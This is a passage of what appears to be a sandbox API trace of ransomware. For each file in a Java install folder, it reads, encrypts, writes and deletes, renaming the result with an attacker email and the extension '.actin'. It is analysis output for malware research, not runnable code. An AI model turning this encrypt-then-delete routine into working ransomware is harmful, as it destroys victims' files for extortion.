lpOverlapped=0x0 | out: lpBuffer=0x385113a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0152.944] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0152.944] WriteFile (in: hFile=0x2dc, lpBuffer=0x385113a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, lpOverlapped=0x0 | out: lpBuffer=0x385113a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0152.945] CloseHandle (hObject=0x2dc) returned 1 [0152.946] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa.id[B4197730-0115].[fileisafe@tuta.io].actin", dwFileAttributes=0x21) returned 1 [0152.946] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.946] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.061] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1423) returned 1 [0153.061] CloseHandle (hObject=0x2fc) returned 1 [0153.061] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt")) returned 0x20 [0153.062] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.062] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.062] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.062] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.062] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.062] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3370) returned 1 [0153.062] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.062] ReadFile (in: hFile=0x2fc, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x58f, lpOverlapped=0x0) returned 1 [0153.064] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x590, dwBufLen=0x590 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x590) returned 1 [0153.064] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x590, lpOverlapped=0x0) returned 1 [0153.065] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3470) returned 1 [0153.065] CryptSetKeyParam (hKey=0xac3470, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.065] CryptEncrypt (in: hKey=0xac3470, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0153.065] CryptDestroyKey (hKey=0xac3470) returned 1 [0153.065] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0153.065] CryptDestroyKey (hKey=0xac3370) returned 1 [0153.065] CloseHandle (hObject=0x2fc) returned 1 [0153.065] CloseHandle (hObject=0x2f0) returned 1 [0153.065] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt")) returned 1 [0153.066] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.066] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.066] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=70208) returned 1 [0153.066] CloseHandle (hObject=0x2f0) returned 1 [0153.067] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe")) returned 0x20 [0153.067] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.067] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.067] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.067] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.067] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.067] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac33f0) returned 1 [0153.067] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.067] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x11240, lpOverlapped=0x0) returned 1 [0153.070] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x11250, dwBufLen=0x11250 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x11250) returned 1 [0153.070] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x11250, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x11250, lpOverlapped=0x0) returned 1 [0153.072] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac34b0) returned 1 [0153.072] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.072] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0153.072] CryptDestroyKey (hKey=0xac34b0) returned 1 [0153.072] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0153.072] CryptDestroyKey (hKey=0xac33f0) returned 1 [0153.072] CloseHandle (hObject=0x2f0) returned 1 [0153.072] CloseHandle (hObject=0x2fc) returned 1 [0153.072] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe")) returned 1 [0153.074] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.074] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.074] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=135744) returned 1 [0153.074] CloseHandle (hObject=0x2fc) returned 1 [0153.074] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll")) returned 0x20 [0153.074] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.075] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.075] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.075] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.075] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.075] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac33f0) returned 1 [0153.075] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.075] ReadFile (in: hFile=0x2fc, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x21240, lpOverlapped=0x0) returned 1 [0153.079] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x21250, dwBufLen=0x21250 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x21250) returned 1 [0153.079] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x21250, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x21250, lpOverlapped=0x0) returned 1 [0153.082] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3130) returned 1 [0153.082] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.082] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0153.082] CryptDestroyKey (hKey=0xac3130) returned 1 [0153.082] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0153.082] CryptDestroyKey (hKey=0xac33f0) returned 1 [0153.082] CloseHandle (hObject=0x2fc) returned 1 [0153.082] CloseHandle (hObject=0x2f0) returned 1 [0153.089] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll")) returned 1 [0153.091] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.091] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.107] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=31808) returned 1 [0153.107] CloseHandle (hObject=0x2f0) returned 1 [0153.107] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll")) returned 0x20 [0153.107] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.107] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.107] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.107] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.107] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.108] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac33f0) returned 1 [0153.108] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.108] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x7c40, lpOverlapped=0x0) returned 1 [0153.110] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x7c50, dwBufLen=0x7c50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x7c50) returned 1 [0153.110] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x7c50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x7c50, lpOverlapped=0x0) returned 1 [0153.112] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3370) returned 1 [0153.112] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.112] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0153.112] CryptDestroyKey (hKey=0xac3370) returned 1 [0153.112] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0153.112] CryptDestroyKey (hKey=0xac33f0) returned 1 [0153.112] CloseHandle (hObject=0x2f0) returned 1 [0153.112] CloseHandle (hObject=0x2fc) returned 1 [0153.112] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunmscapi.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunmscapi.dll")) returned 1 [0153.116] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.116] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.116] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=255040) returned 1 [0153.116] CloseHandle (hObject=0x2fc) returned 1 [0153.116] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll")) returned 0x20 [0153.116] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.116] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.116] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.116] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.116] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.117] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2d70) returned 1 [0153.117] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.117] ReadFile (in: hFile=0x2fc, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x3e440, lpOverlapped=0x0) returned 1 [0153.123] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x3e450, dwBufLen=0x3e450 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x3e450) returned 1 [0153.123] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x3e450, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x3e450, lpOverlapped=0x0) returned 1 [0153.127] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2df0) returned 1 [0153.128] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.128] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30, dwBufLen=0x30 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30) returned 1 [0153.128] CryptDestroyKey (hKey=0xac2df0) returned 1 [0153.128] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xe2, lpOverlapped=0x0) returned 1 [0153.128] CryptDestroyKey (hKey=0xac2d70) returned 1 [0153.128] CloseHandle (hObject=0x2fc) returned 1 [0153.128] CloseHandle (hObject=0x2f0) returned 1 [0153.128] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\t2k.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\t2k.dll")) returned 1 [0153.130] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.130] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.131] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=16448) returned 1 [0153.131] CloseHandle (hObject=0x2f0) returned 1 [0153.131] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe")) returned 0x20 [0153.131] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.131] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.131] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.131] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.131] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.131] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac34b0) returned 1 [0153.131] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.131] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, 